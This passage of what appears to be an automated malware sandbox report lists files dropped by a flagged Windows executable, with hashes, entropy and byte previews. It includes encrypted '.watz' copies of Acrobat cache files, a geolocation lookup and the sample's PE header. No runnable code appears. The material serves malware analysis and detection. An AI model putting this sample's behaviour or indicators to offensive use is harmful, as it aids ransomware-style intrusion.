Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	818
Entropy (8bit):	7.7084818711828715
Encrypted:	false
SSDEEP:	24:YKWE21s4YRjhLtV8bvkpwiXQ8RJ1CYaYdcqKPEkIQa+DraTbD:Yy2y4Y7J2bvEwIBNdGEQDr+D
MD5:	5BC2B220E685C913F611390AA2832290
SHA1:	6DDE48761E8FBE59C559EBCC05EAE61C404F9E3F
SHA-256:	BB8FB5A88EF7C8BB0EEE37583284A671C3FE21DF7ADE0018C854A24D905845C9
SHA-512:	7CE70E846C8FF2C0D8E1C0FD0E127D5645463B00DBF28E77CAF25D4B38926665E76104A5080E5C01CE6F430E37F8BC52AFFD0C9A17B829729783C8772BD72F54
Malicious:	false
Reputation:	low
Preview:	{"os_..=..e>C...J..X#..A3.....L...?j.r........&TUZ.....z.,.b^.......U;...Ek<..........3a!.3.z...$...8....1-..s..}K00g..?.7..K.E.f.....H./..5d...R.i.....UArI!P..+...=_.C.~._..^e.'...v.V..'....j7.OJ...]....<..G#..i.Z...wd.v+.8..Qi.e..3...;.._....RM...ji.^.......Rh_..nw.b.##...T"..[`7[.3r..R6....MJ....i..H...p)..<0......:S^.~H.;x./Ff....t..hVk..V}..FG........."Y,.......!M6!...^..?;...:%.\t..X...,".. .F$..>.ON..7.a....F.:....Z3...D...F~#.W]..K....\|....G...3#T73t.....Y.r.-..[.Zynf.......u@/d..._....mk.Kk;.<...C].X./.Rj.dR3m.R...f...."....vp;xL#o....$.....p?o..7....f1.T>.1.V.Faj.,.?._..f.f-y._..Cm........Fu+V~Tma.V.F.-(U>.T57...s....)..P Q..6M9....I.<y.E.[.^....={-..........C....M.7+.n..S..d..EzJ.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	818
Entropy (8bit):	7.7084818711828715
Encrypted:	false
SSDEEP:	24:YKWE21s4YRjhLtV8bvkpwiXQ8RJ1CYaYdcqKPEkIQa+DraTbD:Yy2y4Y7J2bvEwIBNdGEQDr+D
MD5:	5BC2B220E685C913F611390AA2832290
SHA1:	6DDE48761E8FBE59C559EBCC05EAE61C404F9E3F
SHA-256:	BB8FB5A88EF7C8BB0EEE37583284A671C3FE21DF7ADE0018C854A24D905845C9
SHA-512:	7CE70E846C8FF2C0D8E1C0FD0E127D5645463B00DBF28E77CAF25D4B38926665E76104A5080E5C01CE6F430E37F8BC52AFFD0C9A17B829729783C8772BD72F54
Malicious:	false
Preview:	{"os_..=..e>C...J..X#..A3.....L...?j.r........&TUZ.....z.,.b^.......U;...Ek<..........3a!.3.z...$...8....1-..s..}K00g..?.7..K.E.f.....H./..5d...R.i.....UArI!P..+...=_.C.~._..^e.'...v.V..'....j7.OJ...]....<..G#..i.Z...wd.v+.8..Qi.e..3...;.._....RM...ji.^.......Rh_..nw.b.##...T"..[`7[.3r..R6....MJ....i..H...p)..<0......:S^.~H.;x./Ff....t..hVk..V}..FG........."Y,.......!M6!...^..?;...:%.\t..X...,".. .F$..>.ON..7.a....F.:....Z3...D...F~#.W]..K....\|....G...3#T73t.....Y.r.-..[.Zynf.......u@/d..._....mk.Kk;.<...C].X./.Rj.dR3m.R...f...."....vp;xL#o....$.....p?o..7....f1.T>.1.V.Faj.,.?._..f.f-y._..Cm........Fu+V~Tma.V.F.-(U>.T57...s....)..P Q..6M9....I.<y.E.[.^....={-..........C....M.7+.n..S..d..EzJ.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	4168
Entropy (8bit):	7.952392313610882
Encrypted:	false
SSDEEP:	96:N3XRLmZVkkIcVBtTki/wId6S03mdwn5WHF5KS5i:pXR8nIcrtA1Scmdp5KSg
MD5:	9499A7A8307B0CC4C2DDDF3BE5BDF870
SHA1:	10A1450FE900BF35E578F55DD3EBDB71734BA4CC
SHA-256:	753C603EAE852D1E324D87F561F20BDDF534F326E0C8743595ACEE70C028C8A1
SHA-512:	9281418FD177ADD0403CB2D991CA97FE788597FF73CED1A0890F5591284DE19F8C2218B5EA668529211CE4E7694B36EB38F28B6A4BF83D9252D2A6265D108A1D
Malicious:	false
Preview:	...#OPPd..g......b....wP.Z4....s.....a=..,g...........q.......u-.x..r....%D.2...g.EN.\..w...!..f.a..Q..T...3..W.'-^^M...eTIn,.f.....T.]..u......{..O...Ix....w....\........k..O'....%..@]../..(..LeQyR?~V..2G.....g...$..-....0'h@.h....n=.7~?.2x..w....w..1..m..SO-..bY..w.P{.UG2.Q.....0...D...bD...}....'N0s...5.F....b..T3..t..]?..P.z.m......?...{..g>.7.......h....RZn:R...`...#.k....4..u}....[9.?.z'.....0..1._..Z..S.j]..f.....N....\.m8.W.bn...V.1.3.Y.9..AC..c..:..e'......T..u..p.I..E.......a..\.....'...{.3....]..u.........K.S.9.Y..?..n8.h..ae[!E.%.i.A..l '6..x...:.....{T.ml+.}.Ttl'W.{...6.hL.K......0.!...#..(B.\|....V..^....z..0.J.wl.9....&.....E"..mp....YG...V$.e.._(.....f..d.8O.a.q2..v.z....t.@...C..1Q^Yd..6%.i#\|L..+.@v.WfX..59RO9.......0.~Y.Qc"(..(...0..;.DQ..`._6..:.l..g.'...%.z"yS;.`..rw......,o../..e-.,3....i..3.....G.Q.ed.^?........l/.]...xn.QoN.....oR.K).y.Y.(~...R6....T.......?..w0C...Wzs.........H.......=.......j.q..s.....}).Tf..T.j.f.H.`

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	4168
Entropy (8bit):	7.952392313610882
Encrypted:	false
SSDEEP:	96:N3XRLmZVkkIcVBtTki/wId6S03mdwn5WHF5KS5i:pXR8nIcrtA1Scmdp5KSg
MD5:	9499A7A8307B0CC4C2DDDF3BE5BDF870
SHA1:	10A1450FE900BF35E578F55DD3EBDB71734BA4CC
SHA-256:	753C603EAE852D1E324D87F561F20BDDF534F326E0C8743595ACEE70C028C8A1
SHA-512:	9281418FD177ADD0403CB2D991CA97FE788597FF73CED1A0890F5591284DE19F8C2218B5EA668529211CE4E7694B36EB38F28B6A4BF83D9252D2A6265D108A1D
Malicious:	false
Preview:	...#OPPd..g......b....wP.Z4....s.....a=..,g...........q.......u-.x..r....%D.2...g.EN.\..w...!..f.a..Q..T...3..W.'-^^M...eTIn,.f.....T.]..u......{..O...Ix....w....\........k..O'....%..@]../..(..LeQyR?~V..2G.....g...$..-....0'h@.h....n=.7~?.2x..w....w..1..m..SO-..bY..w.P{.UG2.Q.....0...D...bD...}....'N0s...5.F....b..T3..t..]?..P.z.m......?...{..g>.7.......h....RZn:R...`...#.k....4..u}....[9.?.z'.....0..1._..Z..S.j]..f.....N....\.m8.W.bn...V.1.3.Y.9..AC..c..:..e'......T..u..p.I..E.......a..\.....'...{.3....]..u.........K.S.9.Y..?..n8.h..ae[!E.%.i.A..l '6..x...:.....{T.ml+.}.Ttl'W.{...6.hL.K......0.!...#..(B.\|....V..^....z..0.J.wl.9....&.....E"..mp....YG...V$.e.._(.....f..d.8O.a.q2..v.z....t.@...C..1Q^Yd..6%.i#\|L..+.@v.WfX..59RO9.......0.~Y.Qc"(..(...0..;.DQ..`._6..:.l..g.'...%.z"yS;.`..rw......,o../..e-.,3....i..3.....G.Q.ed.^?........l/.]...xn.QoN.....oR.K).y.Y.(~...R6....T.......?..w0C...Wzs.........H.......=.......j.q..s.....}).Tf..T.j.f.H.`

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	658
Entropy (8bit):	7.713229799549162
Encrypted:	false
SSDEEP:	12:kwMvnF2VmT/wQEsiyHqjsW+p7BdDI1BCTZCLx0ZZWyJD1RUNBytkq7R5p1+cii9a:5oF2VSw7sixspbMPCT8LxaZWkxr76bD
MD5:	62D9EECF864C64ACE122FB9B2413AA4C
SHA1:	EAAA759E3CDBCD95C44AE3CA0C39C6E962D57CA1
SHA-256:	EDBC4233BF617E1A8A5687791D1FA8C03A555CD43685BB8EF354BC3565BBFD33
SHA-512:	3EB3693D8972F35A9B15D68932A238577758E4E5C2EDC05FD917860FAA6E44E69A43CB34252B996B6FA78ECACCE5BC4DAF61E3E85A87163E1C52C4243CDB1B4A
Malicious:	false
Preview:	2023/..6.0`J\|7.D;..re.Q..u}_..Z..I.>.........<.#h...F..&..;...R.;...L....G.&.!2.....g@8.....Y......-[.\.x......\|qx......$..V..gjy........2n0.q..."V....9...t....Q...=.....O.'m(}.......=.!c....\YD}1.um...m..W..-.Qf....~..q._!F=....d.6&...p.]..Cc...q...}..{H....wj.H.~...._.m..A......%.ic.6....,.).w.Q..v.U.h.....b./......CzI..H.v.o.g..C..EB....&..>......`e...5.<.o...hWP.;.G0j.S....l.j...3.B+.i.=Lz%~.%.4'..d.#A...eO..3[F.....<.C#....!....`..Pcs...8b..w{..\|..'m.....C;...G.`...\|..j....<...^.4.....".....B....+..>.].1!.5...~.N....b.j.M...~......SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	658
Entropy (8bit):	7.713229799549162
Encrypted:	false
SSDEEP:	12:kwMvnF2VmT/wQEsiyHqjsW+p7BdDI1BCTZCLx0ZZWyJD1RUNBytkq7R5p1+cii9a:5oF2VSw7sixspbMPCT8LxaZWkxr76bD
MD5:	62D9EECF864C64ACE122FB9B2413AA4C
SHA1:	EAAA759E3CDBCD95C44AE3CA0C39C6E962D57CA1
SHA-256:	EDBC4233BF617E1A8A5687791D1FA8C03A555CD43685BB8EF354BC3565BBFD33
SHA-512:	3EB3693D8972F35A9B15D68932A238577758E4E5C2EDC05FD917860FAA6E44E69A43CB34252B996B6FA78ECACCE5BC4DAF61E3E85A87163E1C52C4243CDB1B4A
Malicious:	false
Preview:	2023/..6.0`J\|7.D;..re.Q..u}_..Z..I.>.........<.#h...F..&..;...R.;...L....G.&.!2.....g@8.....Y......-[.\.x......\|qx......$..V..gjy........2n0.q..."V....9...t....Q...=.....O.'m(}.......=.!c....\YD}1.um...m..W..-.Qf....~..q._!F=....d.6&...p.]..Cc...q...}..{H....wj.H.~...._.m..A......%.ic.6....,.).w.Q..v.U.h.....b./......CzI..H.v.o.g..C..EB....&..>......`e...5.<.o...hWP.;.G0j.S....l.j...3.B+.i.=Lz%~.%.4'..d.#A...eO..3[F.....<.C#....!....`..Pcs...8b..w{..\|..'m.....C;...G.`...\|..j....<...^.4.....".....B....+..>.].1!.5...~.N....b.j.M...~......SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	440
Entropy (8bit):	7.485044936632231
Encrypted:	false
SSDEEP:	12:5n/3Wy9+X5pN/Tflcip1ASOh0K8SbQV9sOz1+cii9a:5/m3zaSm58WWsOAbD
MD5:	85571CAAEA4C867ED6B472E3ED9DC083
SHA1:	B0D03A2B0CF485F32A993D8FB13127421F75C79C
SHA-256:	F7AE7DB5EED53C049B3FC4BA473BEE2344D09E4882F2A08BBB8894257D9887D0
SHA-512:	72883DA5EE5A338AA24FC0C9B014F72905CD5D1375FCBF419A24BC15FC43390D09E29550900127CC51EE91CCC82C6ADD58B51A40E4DE4C8A4963D0589EAF37EE
Malicious:	false
Preview:	S.z1.7w.H:...SkC...-..d.oog.j.0.;..%h...j...F...5.r..5Vc>..7b%......u\|...+. ^..Z.0L.:.v.x...$...P.N.1.....N.$.e.b-.../.TE/....9..A.+....T}.10.I..C..E.(U..S.A...mN....e.5.....Q@9~,.1P....Z96..o....6.c@.g.._..U..4..=...6=@.g.....6_b..B..T!..a.(...[...F.^.W...H..:q.p."....?.2......'..c..99..\|......O..R.....>...,.I.ZO.........A.[ o.s....W...A......=HlSLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	440
Entropy (8bit):	7.485044936632231
Encrypted:	false
SSDEEP:	12:5n/3Wy9+X5pN/Tflcip1ASOh0K8SbQV9sOz1+cii9a:5/m3zaSm58WWsOAbD
MD5:	85571CAAEA4C867ED6B472E3ED9DC083
SHA1:	B0D03A2B0CF485F32A993D8FB13127421F75C79C
SHA-256:	F7AE7DB5EED53C049B3FC4BA473BEE2344D09E4882F2A08BBB8894257D9887D0
SHA-512:	72883DA5EE5A338AA24FC0C9B014F72905CD5D1375FCBF419A24BC15FC43390D09E29550900127CC51EE91CCC82C6ADD58B51A40E4DE4C8A4963D0589EAF37EE
Malicious:	false
Preview:	S.z1.7w.H:...SkC...-..d.oog.j.0.;..%h...j...F...5.r..5Vc>..7b%......u\|...+. ^..Z.0L.:.v.x...$...P.N.1.....N.$.e.b-.../.TE/....9..A.+....T}.10.I..C..E.(U..S.A...mN....e.5.....Q@9~,.1P....Z96..o....6.c@.g.._..U..4..=...6=@.g.....6_b..B..T!..a.(...[...F.^.W...H..:q.p."....?.2......'..c..99..\|......O..R.....>...,.I.ZO.........A.[ o.s....W...A......=HlSLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\LOG.old

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	617
Entropy (8bit):	7.652090549571833
Encrypted:	false
SSDEEP:	12:kEP0WB8f26CxqihYPuG/FPXdGQAijsq57j0faUWI1+cii9a:FeW+uiFfsaQkj0SjbD
MD5:	D4E760DDDA0004CF367C829D25535CE7
SHA1:	82761860DD38BB0CAA27AFB73B9018671A432E07
SHA-256:	A6BD4847C2A8BBABF8571D53928FF75DD62D49BF31364D356D913436D2058FA4
SHA-512:	384D9F84F4E3948BC7F185817A89CA49B11E7678E4AF949EBA373059A919A5B14FC9DA36914444BC39800E3F70B2DF8069C5A31532FA4D8DB49FB7D7AFB7A6C7
Malicious:	false
Preview:	2023/....^q.z...Lt.p..D.mc..f..&5.. .....N..u. ..G.,H.^....\|D...j.V.............>....b.m...;AO4.w...n....=.t..CE.n.N..P.8..Z_i.......p.c.w\|.v.h!:.....&....;.......EB.L...&b.w.X..]gC..S..\|.....!7.....,......'..`..o..@C...........C4.1.....p>.+o....`a.N...lS...}f.5..p.BcT..z.~...:..^=.\|....e0P...c.m=..ft.Yz.h.._........u%j]...@.Z2..(5E@.0.5.\K.....qC.>E.!.+2.I)I..r....#.T8....\|..r..v\|.M...V......LQ....x.?...)>.&.6...]..5..*.v.2.9.......C.\|....^.l....+e..ru^.o../.Q.s.I.....#..}... Hl..\..;.........6..!....F.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\LOG.old.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	617
Entropy (8bit):	7.652090549571833
Encrypted:	false
SSDEEP:	12:kEP0WB8f26CxqihYPuG/FPXdGQAijsq57j0faUWI1+cii9a:FeW+uiFfsaQkj0SjbD
MD5:	D4E760DDDA0004CF367C829D25535CE7
SHA1:	82761860DD38BB0CAA27AFB73B9018671A432E07
SHA-256:	A6BD4847C2A8BBABF8571D53928FF75DD62D49BF31364D356D913436D2058FA4
SHA-512:	384D9F84F4E3948BC7F185817A89CA49B11E7678E4AF949EBA373059A919A5B14FC9DA36914444BC39800E3F70B2DF8069C5A31532FA4D8DB49FB7D7AFB7A6C7
Malicious:	false
Preview:	2023/....^q.z...Lt.p..D.mc..f..&5.. .....N..u. ..G.,H.^....\|D...j.V.............>....b.m...;AO4.w...n....=.t..CE.n.N..P.8..Z_i.......p.c.w\|.v.h!:.....&....;.......EB.L...&b.w.X..]gC..S..\|.....!7.....,......'..`..o..@C...........C4.1.....p>.+o....`a.N...lS...}f.5..p.BcT..z.~...:..^=.\|....e0P...c.m=..ft.Yz.h.._........u%j]...@.Z2..(5E@.0.5.\K.....qC.>E.!.+2.I)I..r....#.T8....\|..r..v\|.M...V......LQ....x.?...)>.&.6...]..5..*.v.2.9.......C.\|....^.l....+e..ru^.o../.Q.s.I.....#..}... Hl..\..;.........6..!....F.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	494
Entropy (8bit):	7.555506396730721
Encrypted:	false
SSDEEP:	12:G0R+Ybd00KuPqxsUsPOk3NSWm9bHolIbt4cDNI/5pZbf1+cii9a:G0RdtKu3UAO0NEolIZ4cDNw/ZAbD
MD5:	05CB01ACFD0BB03E8E61876581545CAD
SHA1:	0685789D3B17C270F1024F6BEFEC0BD949D0BD4D
SHA-256:	9025530A61A085EF5B537A70CF2641DA9B380C92F304BEB932825194D4F0DD32
SHA-512:	5C2044ABD85D5D95C35ABB957B13DE823233D86A203A81A4936F42E315226576FC497F01BB85FCDB336F9009C1FB1BA2CDD5776987456A4A11C9F20ED52EB019
Malicious:	false
Preview:	.h.6.$:..C..EQ0.P...0.^..=......B.}.)...X6.Y........\|o......>...$3.n[.....>8y.kn..s:+..2...=...O....5#.L.=..../..Ai.u.f.\|I{..?Lpm..E].`..<y...j....7Z6'W...._..3............}.K...W..j.T.y.....#.v..k^.#9.......~o....b.R...k.....Q..~.R'<...}...~...J..."b.AE.n.!U.J....s.k.....pAe_.F.vw..=....v.hpq.>N.($..W...V.F......j$.......F...<SY..c.yk.x....p....D....t.........Q....U..&.y...KfdXk/O..nT-....G SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	494
Entropy (8bit):	7.555506396730721
Encrypted:	false
SSDEEP:	12:G0R+Ybd00KuPqxsUsPOk3NSWm9bHolIbt4cDNI/5pZbf1+cii9a:G0RdtKu3UAO0NEolIZ4cDNw/ZAbD
MD5:	05CB01ACFD0BB03E8E61876581545CAD
SHA1:	0685789D3B17C270F1024F6BEFEC0BD949D0BD4D
SHA-256:	9025530A61A085EF5B537A70CF2641DA9B380C92F304BEB932825194D4F0DD32
SHA-512:	5C2044ABD85D5D95C35ABB957B13DE823233D86A203A81A4936F42E315226576FC497F01BB85FCDB336F9009C1FB1BA2CDD5776987456A4A11C9F20ED52EB019
Malicious:	false
Preview:	.h.6.$:..C..EQ0.P...0.^..=......B.}.)...X6.Y........\|o......>...$3.n[.....>8y.kn..s:+..2...=...O....5#.L.=..../..Ai.u.f.\|I{..?Lpm..E].`..<y...j....7Z6'W...._..3............}.K...W..j.T.y.....#.v..k^.#9.......~o....b.R...k.....Q..~.R'<...}...~...J..."b.AE.n.!U.J....s.k.....pAe_.F.vw..=....v.hpq.>N.($..W...V.F......j$.......F...<SY..c.yk.x....p....D....t.........Q....U..&.y...KfdXk/O..nT-....G SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\LOG.old

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	modified
Size (bytes):	635
Entropy (8bit):	7.633110081840474
Encrypted:	false
SSDEEP:	12:k6l5fBkIkvPWtzxz5OnDfmStj9kuiMM4DLd4cVAolInfTpcvf1+cii9a:TfAPg1z5kf7ji43O4AoyTpcUbD
MD5:	344D53A66EFD889BE7DCA1C51C36BE34
SHA1:	6E7AB21EF4D2043C4F2D057CB01D49B065F280A0
SHA-256:	1C381CBCFC9D2B193E3CC210FF6B06625BA02F2001E71206334651F8A731BFBD
SHA-512:	2BF1F379A4E5A73A6A3723F888BA3EFC6890BAA7EBF6F407415DBDE325F5086832FAC1B94C547703289190E0A2BFDACE01A3CD037E88259D45405CCADFDAC376
Malicious:	false
Preview:	2023/F..D..;:..UQ'?TR]....(<J.i....=.i...]5.+...Z.#v...6gP.6....A...lYB......\-!+..bj........-....}.UfN..G...^T\.j..9{4........O-;....,.+..C..)......Q4.d.r.>.........`H......(/.>$..D.7.d......%.....l..p5ERr.K..&.b.@.....{j...I+.p.kW..)....K.'..?.\|S...&.ga...w.2..Rv...T>.......e......I.;B.......O.[.....aK86.....c..%I..t}....j..C..,t..[.>8c...0d...VR.d.W4..."...D.]_$H...)....g..J..zXRA...Rsd`...lHM....<.r.>..9U..@q.4.)G..1.k..-..g.VZ~-..$:X4....O/..1Y...7;YHa.].59Z.k.F....&....-&.W.X.a...D......a.<..I....QQ..@..h.....\|<....-.\SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\LOG.old.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	635
Entropy (8bit):	7.633110081840474
Encrypted:	false
SSDEEP:	12:k6l5fBkIkvPWtzxz5OnDfmStj9kuiMM4DLd4cVAolInfTpcvf1+cii9a:TfAPg1z5kf7ji43O4AoyTpcUbD
MD5:	344D53A66EFD889BE7DCA1C51C36BE34
SHA1:	6E7AB21EF4D2043C4F2D057CB01D49B065F280A0
SHA-256:	1C381CBCFC9D2B193E3CC210FF6B06625BA02F2001E71206334651F8A731BFBD
SHA-512:	2BF1F379A4E5A73A6A3723F888BA3EFC6890BAA7EBF6F407415DBDE325F5086832FAC1B94C547703289190E0A2BFDACE01A3CD037E88259D45405CCADFDAC376
Malicious:	false
Preview:	2023/F..D..;:..UQ'?TR]....(<J.i....=.i...]5.+...Z.#v...6gP.6....A...lYB......\-!+..bj........-....}.UfN..G...^T\.j..9{4........O-;....,.+..C..)......Q4.d.r.>.........`H......(/.>$..D.7.d......%.....l..p5ERr.K..&.b.@.....{j...I+.p.kW..)....K.'..?.\|S...&.ga...w.2..Rv...T>.......e......I.;B.......O.[.....aK86.....c..%I..t}....j..C..,t..[.>8c...0d...VR.d.W4..."...D.]_$H...)....g..J..zXRA...Rsd`...lHM....<.r.>..9U..@q.4.)G..1.k..-..g.VZ~-..$:X4....O/..1Y...7;YHa.].59Z.k.F....&....-&.W.X.a...D......a.<..I....QQ..@..h.....\|<....-.\SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	746496
Entropy (8bit):	7.574840010352023
Encrypted:	false
SSDEEP:	12288:koywWrwlTyC9yR+xBP4wMpAuhjH8/Hl19KKjNgzqE0CM6EpJMwk:PlTX9Xj4w+hbM1/g2kM
MD5:	D7528CD33B73718B5949277420681F90
SHA1:	61D97F8DA20FF2995890CE5F2C8A2C9E6E51C078
SHA-256:	3B8D07693E296AEE36E7607C71503D981396A21B367E169146AFDD052CDCF4D1
SHA-512:	B3DAB709E19A2A8BAD92B259EA1739AD55564F6FE31E9F4E502B6280AE6C70CDF5A0F1FDA208887DA4BBCF9213986E2038ABE6A09DC2940998DF08D82E87D474
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%K..vK..vK..v..^vJ..vU.LvU..vU.]v[..vU.Kv/..vlz.vN..vK..v>..vU.BvJ..vU.\vJ..vU.YvJ..vRichK..v........PE..L.....Ie.................l..........u.............@.................................._..........................................<.......................................................................@............................................text...7k.......l.................. ..`.rdata..4".......$...p..............@..@.data...(#..........................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\geo[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	411
Entropy (8bit):	4.6420780896559455
Encrypted:	false
SSDEEP:	12:Yd9wpHEx6useCtrESQVctrESQVzR4heQ3htrESQV/m0mQP2JSnVR:YdgHD+CtrRQVctrRQVzRZQ3htrRQV/m0
MD5:	EDCA7C5EAEC41C2D1880B6161721C8BE
SHA1:	9A650E1C3E6B7E8858A48D55F21C10C99EBE8AC8
SHA-256:	CADED2E85735BEB1518F1C907BB108B1DCD9C481DAD682B7E0A8E1009C541065
SHA-512:	2C39E15ADEAC90FB6D8F5F87B384F86A79E15F0582A4E8618C264FEE7223958E2F51AC5FA60001F95AE215351B677D91718E551DAB655B14F532556CC2D6AA7A
Malicious:	false
Preview:	{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","city":"New york city","city_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","latitude":"40.713192","longitude":"-74.006065"}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\get[1].htm

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	557
Entropy (8bit):	6.017036102656592
Encrypted:	false
SSDEEP:	12:YGJ6838ONrD3LxM8OO+xst1zIBnzmKI15Y1/:YgJ38aX7KAGzm1q
MD5:	C4C2A009303D43379B6505DAE754CB92
SHA1:	FE20E38B05EEC237ED31B5D90115ED3EBA7B89FF
SHA-256:	F0B8EA240CEA32D7AB9FD7E19E8F84B909DB34D44489226196C8830007B878ED
SHA-512:	C9CDFFB3D5A41CAC27B357DC4B983D00EFE37DC9DC786409B9418704E2FDC57AE800E51904F31AC39B736EBC0C02F2E26F6ABEEC67A74D08DCBD6BAC5D5FD697
Malicious:	false
